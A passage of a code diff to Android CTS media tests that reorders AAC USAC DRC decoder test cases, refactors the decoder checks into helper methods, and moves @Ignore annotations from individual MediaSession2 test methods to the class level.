- checkUsacDrcEffectType(6, 3.9810f, 0.5011f, "General", 2, 0, aacDecName);
- } catch (Exception e) {
- Log.v(TAG, "testDecodeUsacDrcEffectTypeM4a General/2/0 failed for dec="
- + aacDecName);
- throw new RuntimeException(e);
- }
+ // test DRC effectTypeID 3 "LIMITED"
+ // L -6dB -> normalization factor = 1/(10^(-6/10)) = 0.2511f
+ // R +6dB -> normalization factor = 1/(10^( 6/10)) = 3.9810f
+ try {
+ checkUsacDrcEffectType(3, 0.2511f, 3.9810f, "Limited", 2, 0, aacDecName);
+ } catch (Exception e) {
+ Log.v(TAG, "testDecodeUsacDrcEffectTypeM4a Limited/2/0 failed for dec="
+ + aacDecName);
+ throw new RuntimeException(e);
+ }
- // test DRC effectTypeID 1 "NIGHT"
- // L -6dB -> normalization factor = 1/(10^(-6/10)) = 0.2511f
- // R +6dB -> normalization factor = 1/(10^( 6/10)) = 3.9810f
- // mono -6dB -> normalization factor = 1/(10^(-6/10)) = 0.2511f
- try {
- checkUsacDrcEffectType(1, 0.2511f, 3.9810f, "Night", 2, 1, aacDecName);
- } catch (Exception e) {
- Log.v(TAG, "testDecodeUsacDrcEffectTypeM4a Night/2/1 for dec=" + aacDecName);
- throw new RuntimeException(e);
- }
- try {
- checkUsacDrcEffectType(1, 0.2511f, 0.0f, "Night", 1, 1, aacDecName);
- } catch (Exception e) {
- Log.v(TAG, "testDecodeUsacDrcEffectTypeM4a Night/1/1 for dec=" + aacDecName);
- throw new RuntimeException(e);
- }
+ // test DRC effectTypeID 6 "GENERAL"
+ // L +6dB -> normalization factor = 1/(10^( 6/10)) = 3.9810f
+ // R -3dB -> normalization factor = 1/(10^(-3/10)) = 0.5011f
+ try {
+ checkUsacDrcEffectType(6, 3.9810f, 0.5011f, "General", 2, 0, aacDecName);
+ } catch (Exception e) {
+ Log.v(TAG, "testDecodeUsacDrcEffectTypeM4a General/2/0 failed for dec="
+ + aacDecName);
+ throw new RuntimeException(e);
+ }
- // test DRC effectTypeID 2 "NOISY"
- // L +6dB -> normalization factor = 1/(10^( 6/10)) = 3.9810f
- // R -9dB -> normalization factor = 1/(10^(-9/10)) = 0.1258f
- // mono +6dB -> normalization factor = 1/(10^( 6/10)) = 3.9810f
- try {
- checkUsacDrcEffectType(2, 3.9810f, 0.1258f, "Noisy", 2, 1, aacDecName);
- } catch (Exception e) {
- Log.v(TAG, "testDecodeUsacDrcEffectTypeM4a Noisy/2/1 for dec=" + aacDecName);
- throw new RuntimeException(e);
- }
- try {
- checkUsacDrcEffectType(2, 3.9810f, 0.0f, "Noisy", 1, 1, aacDecName);
- } catch (Exception e) {
- Log.v(TAG, "testDecodeUsacDrcEffectTypeM4a Night/2/1 for dec=" + aacDecName);
- throw new RuntimeException(e);
- }
+ // test DRC effectTypeID 1 "NIGHT"
+ // L -6dB -> normalization factor = 1/(10^(-6/10)) = 0.2511f
+ // R +6dB -> normalization factor = 1/(10^( 6/10)) = 3.9810f
+ // mono -6dB -> normalization factor = 1/(10^(-6/10)) = 0.2511f
+ try {
+ checkUsacDrcEffectType(1, 0.2511f, 3.9810f, "Night", 2, 1, aacDecName);
+ } catch (Exception e) {
+ Log.v(TAG, "testDecodeUsacDrcEffectTypeM4a Night/2/1 for dec=" + aacDecName);
+ throw new RuntimeException(e);
+ }
+ try {
+ checkUsacDrcEffectType(1, 0.2511f, 0.0f, "Night", 1, 1, aacDecName);
+ } catch (Exception e) {
+ Log.v(TAG, "testDecodeUsacDrcEffectTypeM4a Night/1/1 for dec=" + aacDecName);
+ throw new RuntimeException(e);
+ }
- // test DRC effectTypeID 3 "LIMITED"
- // L -9dB -> normalization factor = 1/(10^(-9/10)) = 0.1258f
- // R +9dB -> normalization factor = 1/(10^( 9/10)) = 7.9432f
- // mono -9dB -> normalization factor = 1/(10^(-9/10)) = 0.1258f
- try {
- checkUsacDrcEffectType(3, 0.1258f, 7.9432f, "Limited", 2, 1, aacDecName);
- } catch (Exception e) {
- Log.v(TAG, "testDecodeUsacDrcEffectTypeM4a Limited/2/1 for dec=" + aacDecName);
- throw new RuntimeException(e);
- }
- try {
- checkUsacDrcEffectType(3, 0.1258f, 0.0f, "Limited", 1, 1, aacDecName);
- } catch (Exception e) {
- Log.v(TAG, "testDecodeUsacDrcEffectTypeM4a Limited/1/1 for dec=" + aacDecName);
- throw new RuntimeException(e);
- }
+ // test DRC effectTypeID 2 "NOISY"
+ // L +6dB -> normalization factor = 1/(10^( 6/10)) = 3.9810f
+ // R -9dB -> normalization factor = 1/(10^(-9/10)) = 0.1258f
+ // mono +6dB -> normalization factor = 1/(10^( 6/10)) = 3.9810f
+ try {
+ checkUsacDrcEffectType(2, 3.9810f, 0.1258f, "Noisy", 2, 1, aacDecName);
+ } catch (Exception e) {
+ Log.v(TAG, "testDecodeUsacDrcEffectTypeM4a Noisy/2/1 for dec=" + aacDecName);
+ throw new RuntimeException(e);
+ }
+ try {
+ checkUsacDrcEffectType(2, 3.9810f, 0.0f, "Noisy", 1, 1, aacDecName);
+ } catch (Exception e) {
+ Log.v(TAG, "testDecodeUsacDrcEffectTypeM4a Night/2/1 for dec=" + aacDecName);
+ throw new RuntimeException(e);
+ }
- // test DRC effectTypeID 6 "GENERAL"
- // L +9dB -> normalization factor = 1/(10^( 9/10)) = 7.9432f
- // R -6dB -> normalization factor = 1/(10^(-6/10)) = 0.2511f
- // mono +9dB -> normalization factor = 1/(10^( 9/10)) = 7.9432f
- try {
- checkUsacDrcEffectType(6, 7.9432f, 0.2511f, "General", 2, 1, aacDecName);
- } catch (Exception e) {
- Log.v(TAG, "testDecodeUsacDrcEffectTypeM4a General/2/1 for dec=" + aacDecName);
- throw new RuntimeException(e);
- }
- try {
- checkUsacDrcEffectType(6, 7.9432f, 0.0f, "General", 1, 1, aacDecName);
- } catch (Exception e) {
- Log.v(TAG, "testDecodeUsacDrcEffectTypeM4a General/1/1 for dec=" + aacDecName);
- throw new RuntimeException(e);
- }
+ // test DRC effectTypeID 3 "LIMITED"
+ // L -9dB -> normalization factor = 1/(10^(-9/10)) = 0.1258f
+ // R +9dB -> normalization factor = 1/(10^( 9/10)) = 7.9432f
+ // mono -9dB -> normalization factor = 1/(10^(-9/10)) = 0.1258f
+ try {
+ checkUsacDrcEffectType(3, 0.1258f, 7.9432f, "Limited", 2, 1, aacDecName);
+ } catch (Exception e) {
+ Log.v(TAG, "testDecodeUsacDrcEffectTypeM4a Limited/2/1 for dec=" + aacDecName);
+ throw new RuntimeException(e);
+ }
+ try {
+ checkUsacDrcEffectType(3, 0.1258f, 0.0f, "Limited", 1, 1, aacDecName);
+ } catch (Exception e) {
+ Log.v(TAG, "testDecodeUsacDrcEffectTypeM4a Limited/1/1 for dec=" + aacDecName);
+ throw new RuntimeException(e);
+ }
+
+ // test DRC effectTypeID 6 "GENERAL"
+ // L +9dB -> normalization factor = 1/(10^( 9/10)) = 7.9432f
+ // R -6dB -> normalization factor = 1/(10^(-6/10)) = 0.2511f
+ // mono +9dB -> normalization factor = 1/(10^( 9/10)) = 7.9432f
+ try {
+ checkUsacDrcEffectType(6, 7.9432f, 0.2511f, "General", 2, 1, aacDecName);
+ } catch (Exception e) {
+ Log.v(TAG, "testDecodeUsacDrcEffectTypeM4a General/2/1 for dec=" + aacDecName);
+ throw new RuntimeException(e);
+ }
+ try {
+ checkUsacDrcEffectType(6, 7.9432f, 0.0f, "General", 1, 1, aacDecName);
+ } catch (Exception e) {
+ Log.v(TAG, "testDecodeUsacDrcEffectTypeM4a General/1/1 for dec=" + aacDecName);
+ throw new RuntimeException(e);
}
}
@@ -218,52 +226,61 @@
assertTrue("No AAC decoder found", sAacDecoderNames.size() > 0);
for (String aacDecName : sAacDecoderNames) {
- // Stereo
- // switch between SBR ratios and stereo modes
try {
- checkUsacStreamSwitching(2.5459829E12f, 2,
- R.raw.noise_2ch_44_1khz_aot42_19_lufs_config_change_mp4, aacDecName);
- } catch (Exception e) {
- Log.v(TAG, "testDecodeUsacStreamSwitchingM4a failed 2ch sbr/stereo switch for "
- + aacDecName);
- throw new RuntimeException(e);
- }
-
- // Mono
- // switch between SBR ratios and stereo modes
- try {
- checkUsacStreamSwitching(2.24669126E12f, 1,
- R.raw.noise_1ch_38_4khz_aot42_19_lufs_config_change_mp4, aacDecName);
- } catch (Exception e) {
- Log.v(TAG, "testDecodeUsacStreamSwitchingM4a failed 1ch sbr/stereo switch for "
- + aacDecName);
- throw new RuntimeException(e);
- }
-
- // Stereo
- // switch between USAC modes
- try {
- checkUsacStreamSwitching(2.1E12f, 2,
- R.raw.noise_2ch_35_28khz_aot42_19_lufs_drc_config_change_mp4, aacDecName);
- } catch (Exception e) {
- Log.v(TAG, "testDecodeUsacStreamSwitchingM4a failed 2ch USAC mode switch for "
- + aacDecName);
- throw new RuntimeException(e);
- }
-
- // Mono
- // switch between USAC modes
- try {
- checkUsacStreamSwitching(1.7E12f, 1,
- R.raw.noise_1ch_29_4khz_aot42_19_lufs_drc_config_change_mp4, aacDecName);
- } catch (Exception e) {
- Log.v(TAG, "testDecodeUsacStreamSwitchingM4a failed 1ch USAC mode switch for "
- + aacDecName);
- throw new RuntimeException(e);
+ runDecodeUsacStreamSwitchingM4a(aacDecName);
+ } catch (Error err) {
+ throw new Error(err.getMessage() + " [dec=" + aacDecName + "]" , err);
}
}
}
+ private void runDecodeUsacStreamSwitchingM4a(String aacDecName) throws Exception {
+ // Stereo
+ // switch between SBR ratios and stereo modes
+ try {
+ checkUsacStreamSwitching(2.5459829E12f, 2,
+ R.raw.noise_2ch_44_1khz_aot42_19_lufs_config_change_mp4, aacDecName);
+ } catch (Exception e) {
+ Log.v(TAG, "testDecodeUsacStreamSwitchingM4a failed 2ch sbr/stereo switch for "
+ + aacDecName);
+ throw new RuntimeException(e);
+ }
+
+ // Mono
+ // switch between SBR ratios and stereo modes
+ try {
+ checkUsacStreamSwitching(2.24669126E12f, 1,
+ R.raw.noise_1ch_38_4khz_aot42_19_lufs_config_change_mp4, aacDecName);
+ } catch (Exception e) {
+ Log.v(TAG, "testDecodeUsacStreamSwitchingM4a failed 1ch sbr/stereo switch for "
+ + aacDecName);
+ throw new RuntimeException(e);
+ }
+
+ // Stereo
+ // switch between USAC modes
+ try {
+ checkUsacStreamSwitching(2.1E12f, 2,
+ R.raw.noise_2ch_35_28khz_aot42_19_lufs_drc_config_change_mp4, aacDecName);
+ } catch (Exception e) {
+ Log.v(TAG, "testDecodeUsacStreamSwitchingM4a failed 2ch USAC mode switch for "
+ + aacDecName);
+ throw new RuntimeException(e);
+ }
+
+ // Mono
+ // switch between USAC modes
+ try {
+ checkUsacStreamSwitching(1.7E12f, 1,
+ R.raw.noise_1ch_29_4khz_aot42_19_lufs_drc_config_change_mp4, aacDecName);
+ } catch (Exception e) {
+ Log.v(TAG, "testDecodeUsacStreamSwitchingM4a failed 1ch USAC mode switch for "
+ + aacDecName);
+ throw new RuntimeException(e);
+ }
+
+ }
+
/**
* Verify the correct decoding of USAC bitstreams with various sampling rates.
*/
@@ -275,20 +292,28 @@
for (String aacDecName : sAacDecoderNames) {
try {
- checkUsacSamplingRate(R.raw.noise_2ch_08khz_aot42_19_lufs_mp4, aacDecName);
- checkUsacSamplingRate(R.raw.noise_2ch_12khz_aot42_19_lufs_mp4, aacDecName);
- checkUsacSamplingRate(R.raw.noise_2ch_22_05khz_aot42_19_lufs_mp4, aacDecName);
- checkUsacSamplingRate(R.raw.noise_2ch_64khz_aot42_19_lufs_mp4, aacDecName);
- checkUsacSamplingRate(R.raw.noise_2ch_88_2khz_aot42_19_lufs_mp4, aacDecName);
- checkUsacSamplingRateWoLoudness(R.raw.noise_2ch_19_2khz_aot42_no_ludt_mp4,
- aacDecName);
- } catch (Exception e) {
- Log.v(TAG, "testDecodeUsacSamplingRatesM4a for decoder" + aacDecName);
- throw new RuntimeException(e);
+ runDecodeUsacSamplingRatesM4a(aacDecName);
+ } catch (Error err) {
+ throw new Error(err.getMessage() + " [dec=" + aacDecName + "]" , err);
}
}
}
+ private void runDecodeUsacSamplingRatesM4a(String aacDecName) throws Exception {
+ try {
+ checkUsacSamplingRate(R.raw.noise_2ch_08khz_aot42_19_lufs_mp4, aacDecName);
+ checkUsacSamplingRate(R.raw.noise_2ch_12khz_aot42_19_lufs_mp4, aacDecName);
+ checkUsacSamplingRate(R.raw.noise_2ch_22_05khz_aot42_19_lufs_mp4, aacDecName);
+ checkUsacSamplingRate(R.raw.noise_2ch_64khz_aot42_19_lufs_mp4, aacDecName);
+ checkUsacSamplingRate(R.raw.noise_2ch_88_2khz_aot42_19_lufs_mp4, aacDecName);
+ checkUsacSamplingRateWoLoudness(R.raw.noise_2ch_19_2khz_aot42_no_ludt_mp4,
+ aacDecName);
+ } catch (Exception e) {
+ Log.v(TAG, "testDecodeUsacSamplingRatesM4a for decoder" + aacDecName);
+ throw new RuntimeException(e);
+ }
+ }
+
/**
* Internal utilities
@@ -440,7 +465,7 @@
}
/**
- * Same as {@link #checkEnergyUSAC(short[], AudioParameter, int, int)} but with DRC effec type
+ * Same as {@link #checkEnergyUSAC(short[], AudioParameter, int, int)} but with DRC effect type
* @param decSamples
* @param decParams
* @param encNch
diff --git a/tests/tests/media/src/android/media/cts/MediaSession2Test.java b/tests/tests/media/src/android/media/cts/MediaSession2Test.java
index 1eca156..0f2c56b 100644
--- a/tests/tests/media/src/android/media/cts/MediaSession2Test.java
+++ b/tests/tests/media/src/android/media/cts/MediaSession2Test.java
@@ -72,6 +72,7 @@
*/
@RunWith(AndroidJUnit4.class)
@SmallTest
+@Ignore
@AppModeFull(reason = "TODO: evaluate and port to instant")
public class MediaSession2Test extends MediaSession2TestBase {
private static final String TAG = "MediaSession2Test";
@@ -127,7 +128,6 @@
}
@Test
- @Ignore
public void testPlayerStateChange() throws Exception {
final int targetState = MediaPlayerBase.PLAYER_STATE_PLAYING;
final CountDownLatch latchForSessionCallback = new CountDownLatch(1);
@@ -161,7 +161,6 @@
}
@Test
- @Ignore
public void testCurrentDataSourceChanged() throws Exception {
final int listSize = 5;
final List<MediaItem2> list = TestUtils.createPlaylist(listSize);
@@ -195,7 +194,6 @@
}
@Test
- @Ignore
public void testMediaPrepared() throws Exception {
final int listSize = 5;
final List<MediaItem2> list = TestUtils.createPlaylist(listSize);
@@ -229,7 +227,6 @@
}
@Test
- @Ignore
public void testBufferingStateChanged() throws Exception {
final int listSize = 5;
final List<MediaItem2> list = TestUtils.createPlaylist(listSize);
@@ -265,7 +262,6 @@
}
@Test
- @Ignore
public void testUpdatePlayer() throws Exception {
final int targetState = MediaPlayerBase.PLAYER_STATE_PLAYING;
final CountDownLatch latch = new CountDownLatch(1);
@@ -300,7 +296,6 @@
}
@Test
- @Ignore
public void testSetPlayer_playbackInfo() throws Exception {
MockPlayer player = new MockPlayer(0);
AudioAttributes attrs = new AudioAttributes.Builder()
@@ -355,7 +350,6 @@
}
@Test
- @Ignore
public void testPlay() throws Exception {
sHandler.postAndSync(() -> {
mSession.play();
@@ -364,7 +358,6 @@
}
@Test
- @Ignore
public void testPause() throws Exception {
sHandler.postAndSync(() -> {
mSession.pause();
@@ -382,21 +375,18 @@
}
@Test
- @Ignore
public void testSkipToPreviousItem() {
mSession.skipToPreviousItem();
assertTrue(mMockAgent.mSkipToPreviousItemCalled);
}
@Test
- @Ignore
public void testSkipToNextItem() throws Exception {
mSession.skipToNextItem();
assertTrue(mMockAgent.mSkipToNextItemCalled);
}
@Test
- @Ignore
public void testSkipToPlaylistItem() throws Exception {
final MediaItem2 testMediaItem = TestUtils.createMediaItemWithMetadata();
mSession.skipToPlaylistItem(testMediaItem);
@@ -405,7 +395,6 @@
}
@Test
- @Ignore
public void testGetPlayerState() {
final int state = MediaPlayerBase.PLAYER_STATE_PLAYING;
mPlayer.mLastPlayerState = state;
@@ -413,7 +402,6 @@
}
@Test
- @Ignore
public void testGetPosition() {
final long position = 150000;
mPlayer.mCurrentPosition = position;
@@ -421,7 +409,6 @@
}
@Test
- @Ignore
public void testGetBufferedPosition() {
final long bufferedPosition = 900000;
mPlayer.mBufferedPosition = bufferedPosition;
@@ -429,7 +416,6 @@
}
@Test
- @Ignore
public void testSetPlaylist() {
final List<MediaItem2> list = TestUtils.createPlaylist(2);
mSession.setPlaylist(list, null);
@@ -439,7 +425,6 @@
}
@Test
- @Ignore
public void testGetPlaylist() {
final List<MediaItem2> list = TestUtils.createPlaylist(2);
mMockAgent.mPlaylist = list;
@@ -447,7 +432,6 @@
}
@Test
- @Ignore
public void testUpdatePlaylistMetadata() {
final MediaMetadata2 testMetadata = TestUtils.createMetadata();
mSession.updatePlaylistMetadata(testMetadata);
@@ -456,7 +440,6 @@
}
@Test
- @Ignore
public void testGetPlaylistMetadata() {
final MediaMetadata2 testMetadata = TestUtils.createMetadata();
mMockAgent.mMetadata = testMetadata;
@@ -464,7 +447,6 @@
}
@Test
- @Ignore
public void testSessionCallback_onPlaylistChanged() throws InterruptedException {
final List<MediaItem2> list = TestUtils.createPlaylist(2);
final CountDownLatch latch = new CountDownLatch(1);
@@ -496,7 +478,6 @@
}
@Test
- @Ignore
public void testAddPlaylistItem() {
final int testIndex = 12;
final MediaItem2 testMediaItem = TestUtils.createMediaItemWithMetadata();
@@ -507,7 +488,6 @@
}
@Test
- @Ignore
public void testRemovePlaylistItem() {
final MediaItem2 testMediaItem = TestUtils.createMediaItemWithMetadata();
mSession.removePlaylistItem(testMediaItem);
@@ -516,7 +496,6 @@
}
@Test
- @Ignore
public void testReplacePlaylistItem() throws InterruptedException {
final int testIndex = 12;
final MediaItem2 testMediaItem = TestUtils.createMediaItemWithMetadata();
@@ -531,7 +510,6 @@
* MediaSession2, MediaPlaylistAgent, int)}
*/
@Test
- @Ignore
public void testGetShuffleMode() throws InterruptedException {
final int testShuffleMode = MediaPlaylistAgent.SHUFFLE_MODE_GROUP;
final MediaPlaylistAgent agent = new MediaPlaylistAgent() {
@@ -562,7 +540,6 @@
}
@Test
- @Ignore
public void testSetShuffleMode() {
final int testShuffleMode = MediaPlaylistAgent.SHUFFLE_MODE_GROUP;
mSession.setShuffleMode(testShuffleMode);
@@ -575,7 +552,6 @@
* MediaSession2, MediaPlaylistAgent, int)}
*/
@Test
- @Ignore
public void testGetRepeatMode() throws InterruptedException {
final int testRepeatMode = MediaPlaylistAgent.REPEAT_MODE_GROUP;
final MediaPlaylistAgent agent = new MediaPlaylistAgent() {
@@ -606,7 +582,6 @@
}
@Test
- @Ignore
public void testSetRepeatMode() {
final int testRepeatMode = MediaPlaylistAgent.REPEAT_MODE_GROUP;
mSession.setRepeatMode(testRepeatMode);
@@ -616,7 +591,6 @@
// TODO (jaewan): Revisit
@Test
- @Ignore
public void testBadPlayer() throws InterruptedException {
// TODO(jaewan): Add equivalent tests again
final CountDownLatch latch = new CountDownLatch(4); // expected call + 1
@@ -643,7 +617,6 @@
}
@Test
- @Ignore
public void testOnCommandCallback() throws InterruptedException {
final MockOnCommandCallback callback = new MockOnCommandCallback();
sHandler.postAndSync(() -> {
@@ -670,7 +643,6 @@
}
@Test
- @Ignore
public void testOnConnectCallback() throws InterruptedException {
final MockOnConnectCallback sessionCallback = new MockOnConnectCallback();
sHandler.postAndSync(() -> {
@@ -685,7 +657,6 @@
}
@Test
- @Ignore
public void testOnDisconnectCallback() throws InterruptedException {
final CountDownLatch latch = new CountDownLatch(1);
try (final MediaSession2 session = new MediaSession2.Builder(mContext)
@@ -706,7 +677,6 @@
}
@Test
- @Ignore
public void testSetCustomLayout() throws InterruptedException {
final List<CommandButton> buttons = new ArrayList<>();
buttons.add(new CommandButton.Builder()
@@ -753,7 +723,6 @@
}
@Test
- @Ignore
public void testSetAllowedCommands() throws InterruptedException {
final SessionCommandGroup2 commands = new SessionCommandGroup2();
commands.addCommand(new SessionCommand2(SessionCommand2.COMMAND_CODE_PLAYBACK_PLAY));
@@ -787,7 +756,6 @@
}
@Test
- @Ignore
public void testSendCustomAction() throws InterruptedException {
final SessionCommand2 testCommand = new SessionCommand2(
SessionCommand2.COMMAND_CODE_PLAYBACK_PREPARE);
@@ -818,7 +786,6 @@
}
@Test
- @Ignore
public void testNotifyError() throws InterruptedException {
final int errorCode = MediaSession2.ERROR_CODE_NOT_AVAILABLE_IN_REGION;
final Bundle extras = new Bundle();
diff --git a/tests/tests/media/src/android/media/cts/MediaSession2_PermissionTest.java b/tests/tests/media/src/android/media/cts/MediaSession2_PermissionTest.java
index 3035d8b..6b08fb3 100644
--- a/tests/tests/media/src/android/media/cts/MediaSession2_PermissionTest.java
+++ b/tests/tests/media/src/android/media/cts/MediaSession2_PermissionTest.java
@@ -74,6 +74,7 @@
*/
@RunWith(AndroidJUnit4.class)
@MediumTest
+@Ignore
@AppModeFull(reason = "TODO: evaluate and port to instant")
public class MediaSession2_PermissionTest extends MediaSession2TestBase {
private static final String SESSION_ID = "MediaSession2Test_permission";
@@ -150,7 +151,6 @@
}
@Test
- @Ignore
public void testPlay() throws InterruptedException {
testOnCommandRequest(COMMAND_CODE_PLAYBACK_PLAY, (controller) -> {
controller.play();
@@ -158,7 +158,6 @@
}
@Test
- @Ignore
public void testPause() throws InterruptedException {
testOnCommandRequest(COMMAND_CODE_PLAYBACK_PAUSE, (controller) -> {
controller.pause();
@@ -166,7 +165,6 @@
}
@Test
- @Ignore
public void testStop() throws InterruptedException {
testOnCommandRequest(COMMAND_CODE_PLAYBACK_STOP, (controller) -> {
controller.stop();
@@ -174,7 +172,6 @@
}
@Test
- @Ignore
public void testFastForward() throws InterruptedException {
testOnCommandRequest(COMMAND_CODE_SESSION_FAST_FORWARD, (controller) -> {
controller.fastForward();
@@ -182,7 +179,6 @@
}
@Test
- @Ignore
public void testRewind() throws InterruptedException {
testOnCommandRequest(COMMAND_CODE_SESSION_REWIND, (controller) -> {
controller.rewind();
@@ -190,7 +186,6 @@
}
@Test
- @Ignore
public void testSeekTo() throws InterruptedException {
final long position = 10;
testOnCommandRequest(COMMAND_CODE_PLAYBACK_SEEK_TO, (controller) -> {
@@ -199,7 +194,6 @@
}
@Test
- @Ignore
public void testSkipToNext() throws InterruptedException {
testOnCommandRequest(COMMAND_CODE_PLAYLIST_SKIP_NEXT_ITEM, (controller) -> {
controller.skipToNextItem();
@@ -207,7 +201,6 @@
}
@Test
- @Ignore
public void testSkipToPrevious() throws InterruptedException {
testOnCommandRequest(COMMAND_CODE_PLAYLIST_SKIP_PREV_ITEM, (controller) -> {
controller.skipToPreviousItem();
@@ -215,7 +208,6 @@
}
@Test
- @Ignore
public void testSkipToPlaylistItem() throws InterruptedException {
MediaItem2 testItem = TestUtils.createMediaItemWithMetadata();
testOnCommandRequest(COMMAND_CODE_PLAYLIST_SKIP_TO_PLAYLIST_ITEM, (controller) -> {
@@ -224,7 +216,6 @@
}
@Test
- @Ignore
public void testSetPlaylist() throws InterruptedException {
List<MediaItem2> list = TestUtils.createPlaylist(2);
testOnCommandRequest(COMMAND_CODE_PLAYLIST_SET_LIST, (controller) -> {
@@ -233,7 +224,6 @@
}
@Test
- @Ignore
public void testUpdatePlaylistMetadata() throws InterruptedException {
testOnCommandRequest(COMMAND_CODE_PLAYLIST_SET_LIST_METADATA, (controller) -> {
controller.updatePlaylistMetadata(null);
@@ -241,7 +231,6 @@
}
@Test
- @Ignore
public void testAddPlaylistItem() throws InterruptedException {
MediaItem2 testItem = TestUtils.createMediaItemWithMetadata();
testOnCommandRequest(COMMAND_CODE_PLAYLIST_ADD_ITEM, (controller) -> {
@@ -250,7 +239,6 @@
}
@Test
- @Ignore
public void testRemovePlaylistItem() throws InterruptedException {
MediaItem2 testItem = TestUtils.createMediaItemWithMetadata();
testOnCommandRequest(COMMAND_CODE_PLAYLIST_REMOVE_ITEM, (controller) -> {
@@ -259,7 +247,6 @@
}
@Test
- @Ignore
public void testReplacePlaylistItem() throws InterruptedException {
MediaItem2 testItem = TestUtils.createMediaItemWithMetadata();
testOnCommandRequest(COMMAND_CODE_PLAYLIST_REPLACE_ITEM, (controller) -> {
@@ -268,7 +255,6 @@
}
@Test
- @Ignore
public void testSetVolume() throws InterruptedException {
testOnCommandRequest(COMMAND_CODE_SET_VOLUME, (controller) -> {
controller.setVolumeTo(0, 0);
@@ -276,7 +262,6 @@
}
@Test
- @Ignore
public void testPlayFromMediaId() throws InterruptedException {
final String mediaId = "testPlayFromMediaId";
createSessionWithAllowedActions(
@@ -296,7 +281,6 @@
}
@Test
- @Ignore
public void testPlayFromUri() throws InterruptedException {
final Uri uri = Uri.parse("play://from.uri");
createSessionWithAllowedActions(
@@ -316,7 +300,6 @@
}
@Test
- @Ignore
public void testPlayFromSearch() throws InterruptedException {
final String query = "testPlayFromSearch";
createSessionWithAllowedActions(
@@ -336,7 +319,6 @@
}
@Test
- @Ignore
public void testPrepareFromMediaId() throws InterruptedException {
final String mediaId = "testPrepareFromMediaId";
createSessionWithAllowedActions(
@@ -356,7 +338,6 @@
}
@Test
- @Ignore
public void testPrepareFromUri() throws InterruptedException {
final Uri uri = Uri.parse("prepare://from.uri");
createSessionWithAllowedActions(
@@ -376,7 +357,6 @@
}
@Test
- @Ignore
public void testPrepareFromSearch() throws InterruptedException {
final String query = "testPrepareFromSearch";
createSessionWithAllowedActions(
@@ -396,7 +376,6 @@
}
@Test
- @Ignore
public void testChangingPermissionWithSetAllowedCommands() throws InterruptedException {
final String query = "testChangingPermissionWithSetAllowedCommands";
createSessionWithAllowedActions(
diff --git a/tests/tests/media/src/android/media/cts/MediaSessionManager_MediaSession2Test.java b/tests/tests/media/src/android/media/cts/MediaSessionManager_MediaSession2Test.java
index cfce056..1a3cb7c 100644
--- a/tests/tests/media/src/android/media/cts/MediaSessionManager_MediaSession2Test.java
+++ b/tests/tests/media/src/android/media/cts/MediaSessionManager_MediaSession2Test.java
@@ -53,6 +53,7 @@
*/
@RunWith(AndroidJUnit4.class)
@SmallTest
+@Ignore
@AppModeFull(reason = "TODO: evaluate and port to instant")
public class MediaSessionManager_MediaSession2Test extends MediaSession2TestBase {
private static final String TAG = "MediaSessionManager_MediaSession2Test";
@@ -118,7 +119,6 @@
* @throws InterruptedException
*/
@Test
- @Ignore
public void testGetSessionTokens_sessionRejected() throws InterruptedException {
mSession.close();
mSession = new MediaSession2.Builder(mContext).setPlayer(new MockPlayer(0))
@@ -146,7 +146,6 @@
}
@Test
- @Ignore
public void testGetMediaSession2Tokens_sessionClosed() throws InterruptedException {
mSession.close();
@@ -161,7 +160,6 @@
}
@Test
- @Ignore
public void testGetMediaSessionService2Token() throws InterruptedException {
boolean foundTestSessionService = false;
boolean foundTestLibraryService = false;
@@ -185,7 +183,6 @@
}
@Test
- @Ignore
public void testGetAllSessionTokens() throws InterruptedException {
boolean foundTestSession = false;
boolean foundTestSessionService = false;
@@ -221,7 +218,6 @@
}
@Test
- @Ignore
public void testAddOnSessionTokensChangedListener() throws InterruptedException {
TokensChangedListener listener = new TokensChangedListener();
mManager.addOnSessionTokensChangedListener(sHandlerExecutor, listener);
@@ -276,7 +272,6 @@
}
@Test
- @Ignore
public void testRemoveOnSessionTokensChangedListener() throws InterruptedException {
TokensChangedListener listener = new TokensChangedListener();
mManager.addOnSessionTokensChangedListener(sHandlerExecutor, listener);
diff --git a/tests/tests/media/src/android/media/cts/SessionToken2Test.java b/tests/tests/media/src/android/media/cts/SessionToken2Test.java
index c34ced2..33f416d 100644
--- a/tests/tests/media/src/android/media/cts/SessionToken2Test.java
+++ b/tests/tests/media/src/android/media/cts/SessionToken2Test.java
@@ -16,7 +16,7 @@
package android.media.cts;
-import static org.junit.Assert.assertEquals;
+import static junit.framework.Assert.assertEquals;
import android.content.Context;
import android.media.SessionToken2;
@@ -36,6 +36,7 @@
*/
@RunWith(AndroidJUnit4.class)
@SmallTest
+@Ignore
@AppModeFull(reason = "TODO: evaluate and port to instant")
public class SessionToken2Test {
private Context mContext;
@@ -46,7 +47,6 @@
}
@Test
- @Ignore
public void testConstructor_sessionService() {
SessionToken2 token = new SessionToken2(mContext, mContext.getPackageName(),
MockMediaSessionService2.class.getCanonicalName());
@@ -57,7 +57,6 @@
}
@Test
- @Ignore
public void testConstructor_libraryService() {
SessionToken2 token = new SessionToken2(mContext, mContext.getPackageName(),
MockMediaLibraryService2.class.getCanonicalName());
@@ -66,4 +65,4 @@
assertEquals(Process.myUid(), token.getUid());
assertEquals(SessionToken2.TYPE_LIBRARY_SERVICE, token.getType());
}
-}
+}
\ No newline at end of file
diff --git a/tests/tests/nativehardware/src/android/hardware/nativehardware/cts/HardwareBufferVrTest.java b/tests/tests/nativehardware/src/android/hardware/nativehardware/cts/HardwareBufferVrTest.java
index ff022fc..7d31dc3 100644
--- a/tests/tests/nativehardware/src/android/hardware/nativehardware/cts/HardwareBufferVrTest.java
+++ b/tests/tests/nativehardware/src/android/hardware/nativehardware/cts/HardwareBufferVrTest.java
@@ -21,14 +21,10 @@
import android.hardware.HardwareBuffer;
import android.test.AndroidTestCase;
-import com.android.compatibility.common.util.CddTest;
-
/**
* Checks whether layered buffers are supported when VR feature is present.
*/
public class HardwareBufferVrTest extends AndroidTestCase {
-
- @CddTest(requirement="7.9.2/C-1-10")
public void testLayeredBuffersForVr() throws AssertionError {
boolean mIsVrHeadset = (getContext().getResources().getConfiguration().uiMode
& Configuration.UI_MODE_TYPE_MASK) == Configuration.UI_MODE_TYPE_VR_HEADSET;
diff --git a/tests/tests/notificationlegacy/AndroidManifest.xml b/tests/tests/notificationlegacy/AndroidManifest.xml
index 7b55bc8..dd96eac 100644
--- a/tests/tests/notificationlegacy/AndroidManifest.xml
+++ b/tests/tests/notificationlegacy/AndroidManifest.xml
@@ -17,6 +17,7 @@
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
package="android.app.notification.legacy.cts">
